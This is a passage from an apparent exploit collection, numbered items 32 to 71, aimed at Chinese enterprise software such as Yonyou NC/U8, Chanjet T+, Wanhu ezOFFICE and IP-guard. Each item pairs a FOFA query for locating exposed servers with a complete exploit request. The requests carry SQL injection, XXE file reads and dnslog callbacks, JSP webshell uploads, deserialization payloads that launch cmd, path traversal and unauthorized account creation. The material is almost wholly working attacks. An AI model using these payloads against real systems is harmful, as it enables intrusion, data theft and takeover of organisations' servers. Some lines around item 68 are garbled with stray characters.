User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version = NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it runs a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA:app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD


60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
The sql parameter is base64: c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3 and is executed server-side to build the exported spreadsheet.
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


61. ZJU Enter (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa


62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


Then request the file the echo wrote:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x


63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>


65. Youkate LianAiYun (优卡特脸爱云) face-pass smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the operator account test123456 / 123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators


66. Wanhu ezOFFICE (万户ezOFFICE) collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9 (the MD5 of 102103122 that the payload computes), the vulnerability is confirmed.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
newdocId and the multipart filename give the name of the written file, dir gives the directory it is written to (relative, so ../ traversal is accepted), and fileType gives the extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--


The uploaded file is then reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

% |; y# y$ D; u7 L! {0 M/ }68. 万户ezOFFICE wf_printnum.jsp SQL注入
7 e, N& L# f  d3 Q+ jFOFA:app="万户ezOFFICE协同管理平台"4 L1 Y' [7 ^8 k2 L! G! z5 e0 S$ D
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
* `+ V/ w' u" F# _* zHost: {{host}}( o. z) s- P$ W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36$ M7 r3 L' i7 J1 R: }8 r
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8) W" o- p6 Q3 I8 U) T
Accept-Encoding: gzip, deflate. h" L6 C' @3 s% o( H! L0 I
Accept-Language: zh-CN,zh;q=0.9# O  y+ n' I; p. h" }6 J/ n
Connection: close" m8 m9 q% A; C

4 d4 i0 b* R' r# p0 w1 F1 m$ h6 C! ?! {! I& {9 ]2 }+ ]' [/ y
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


70. Wanhu ezEIP (万户ezEIP) success.aspx command execution
FOFA:app="万户网络-ezEIP"
The command to run is passed base64-encoded in the SID header: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk= decodes to type C:\Windows\win.ini. PAYLOAD stands for the (elided) __VIEWSTATE value.
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD


71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
